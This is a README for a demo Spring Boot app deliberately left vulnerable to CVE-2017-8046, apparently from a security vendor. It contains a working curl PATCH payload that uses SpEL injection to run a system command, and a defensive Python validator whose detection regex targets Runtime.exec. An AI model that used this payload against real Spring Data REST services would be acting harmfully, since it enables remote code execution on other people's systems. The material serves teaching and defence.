POC details: b3f77c5cdc1d7c7bbb6f6dea9a422017c3ca1e9d

Source
Related vulnerability
Title: Pivotal Spring Data REST, Spring Boot and Spring Data security vulnerability (CVE-2017-8046)
Description: Pivotal Spring Data REST, Spring Boot and Spring Data are all products of the US company Pivotal Software. Pivotal Spring Data REST is built on top of Spring Data repositories; it analyses an application's domain model and exposes hypermedia-driven HTTP resources. Spring Boot is a new framework that simplifies the initial setup and development of new Spring applications. Spring Data is a project that provides Spring-model-based data access. Pivotal Spring Data REST, S
Introduction
<p align="center"><a href="https://www.verygoodsecurity.com/"><img src="https://avatars0.githubusercontent.com/u/17788525" width="128" alt="VGS Logo"></a></p>

_**DISCLAIMER:** This repository is supplementary to the VGS blog post,
[How to Avoid "Using Components with Known Vulnerabilities"](https://develop--vgsblog.netlify.com/posts/how-to-avoid-using-components-with-known-vulnerabilities/).
It contains an application with a known security vulnerability (namely,
[CVE-2017-8046](https://pivotal.io/security/cve-2017-8046)), as well as the
description of how to exploit it. Use the application at your own risk!_

## Setting Up

First, start the application by executing the following command from the root of the repository:

```bash
mvn clean spring-boot:run
```

Second, create a resource by sending a `POST` request like this:

```bash
curl -X POST http://localhost:8080/books \
  -H 'Content-Type: application/json' \
  -d '{"isbn":"978-3827268969","title":"Thinking in Java","author":"Bruce Eckel"}'
```

## Exploiting the Vulnerability

```bash
curl -X PATCH http://localhost:8080/books/1 -H 'Content-Type: application/json-patch+json' -d '[{"op":"replace","path":"T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ifconfig\").getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x","value":"Your application has been hacked"}]'
```

Provided you're running the application on a Unix-based operating system (e.g.
macOS), the response will contain the host's network configuration. In fact, any
[SpEL](https://docs.spring.io/spring/docs/current/spring-framework-reference/core.html#expressions)
expression placed in the `path` member can be evaluated.
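
The root cause is that the `path` member of each JSON Patch operation is handed to a SpEL evaluator instead of being treated as an RFC 6901 JSON Pointer. A defensive check that a filter, gateway or log analyser can apply is to reject any patch whose `path`/`from` members are not syntactically valid JSON Pointers. The following is an added example, not code from this repository or from Spring; `is_json_pointer`, `check_json_patch` and the two sample bodies are constructed for illustration (the malicious one is a shortened form of the payload shown above).

```python
import json
import re

# RFC 6901: a pointer is "" or "/"-separated tokens in which "~" may only
# appear as the escapes "~0" (for "~") and "~1" (for "/").
_TOKEN = re.compile(r"^(?:[^/~]|~[01])*$")
# Cheap signal that a value is SpEL rather than a pointer: type references,
# Runtime.exec, or any method call.
_SPEL_HINT = re.compile(r"T\(|\.exec\(|\(\)")


def is_json_pointer(pointer: str) -> bool:
    """True if `pointer` is a syntactically valid RFC 6901 JSON Pointer."""
    if pointer == "":
        return True
    if not pointer.startswith("/"):
        return False
    return all(_TOKEN.match(tok) for tok in pointer[1:].split("/"))


def check_json_patch(body: str) -> list:
    """Return findings as (op_index, member, value, reason); [] means clean."""
    findings = []
    try:
        ops = json.loads(body)
    except ValueError as exc:
        return [(-1, "body", body[:40], f"not JSON: {exc}")]
    if not isinstance(ops, list):
        return [(-1, "body", type(ops).__name__, "JSON Patch must be an array")]
    for i, op in enumerate(ops):
        if not isinstance(op, dict):
            findings.append((i, "op", op, "operation is not an object"))
            continue
        for member in ("path", "from"):  # the only pointer-valued members
            if member not in op:
                continue
            value = op[member]
            if not isinstance(value, str) or not is_json_pointer(value):
                reason = "not a JSON Pointer"
                if isinstance(value, str) and _SPEL_HINT.search(value):
                    reason += "; contains SpEL/method-call syntax"
                findings.append((i, member, value, reason))
    return findings


# Constructed sample bodies: a shortened form of the PATCH payload above, and a
# legitimate patch that only updates the book title.
MALICIOUS = '[{"op":"replace","path":"T(java.lang.Runtime).getRuntime().exec(\\"ifconfig\\").x","value":"x"}]'
BENIGN = '[{"op":"replace","path":"/title","value":"Thinking in Java, 4th ed."}]'

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, check_json_patch(body) or "clean")
```

A real deployment would apply this before the body reaches Spring Data REST, but the lasting fix is upgrading past the affected versions listed in the dependency-check output below.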

## Checking Vulnerable Dependencies

```bash
mvn clean package verify
```

The build will fail as there's a dependency identified with a high-risk
vulnerability:

```
[ERROR] Failed to execute goal org.owasp:dependency-check-maven:3.3.2:check (default) on project CVE-2017-8046:
[ERROR]
[ERROR] One or more dependencies were identified with vulnerabilities that have a CVSS score greater than or equal to '7.0':
[ERROR]
[ERROR] spring-boot-1.5.5.RELEASE.jar: CVE-2017-8046
[ERROR] spring-core-4.3.10.RELEASE.jar: CVE-2018-1275, CVE-2018-1270
[ERROR] jackson-databind-2.8.9.jar: CVE-2017-15095, CVE-2017-17485, CVE-2018-7489
[ERROR] spring-boot-starter-data-rest-1.5.5.RELEASE.jar: CVE-2018-1273, CVE-2017-8046
[ERROR]
[ERROR] See the dependency-check report for more details.
```

## What is VGS?

_**Want to just jump right in?** Check out our [getting started
guide](https://www.verygoodsecurity.com/docs/getting-started)._

Very Good Security (VGS) allows you to enhance your security standing while
maintaining the utility of your data internally and with third-parties. As an
added benefit, we accelerate your compliance certification process and help you
quickly obtain security-related compliances that stand between you and your
market opportunities.

To learn more, visit us at https://www.verygoodsecurity.com/

## License

This project is licensed under the MIT license. See the [LICENSE](LICENSE) file
for details.
File snapshot

```
[4.0K] /data/pocs/b3f77c5cdc1d7c7bbb6f6dea9a422017c3ca1e9d
├── [1.1K] LICENSE
├── [2.3K] pom.xml
├── [3.1K] README.md
└── [4.0K] src
    └── [4.0K] main
        ├── [4.0K] java
        │   └── [4.0K] com
        │       └── [4.0K] verygoodsecurity
        │           ├── [ 643] Application.java
        │           └── [4.0K] domain
        │               ├── [1.3K] AuditableEntity.java
        │               ├── [ 879] Book.java
        │               └── [4.0K] repository
        │                   └── [ 673] BookRepository.java
        └── [4.0K] resources
            └── [ 128] application.yml

8 directories, 8 files
```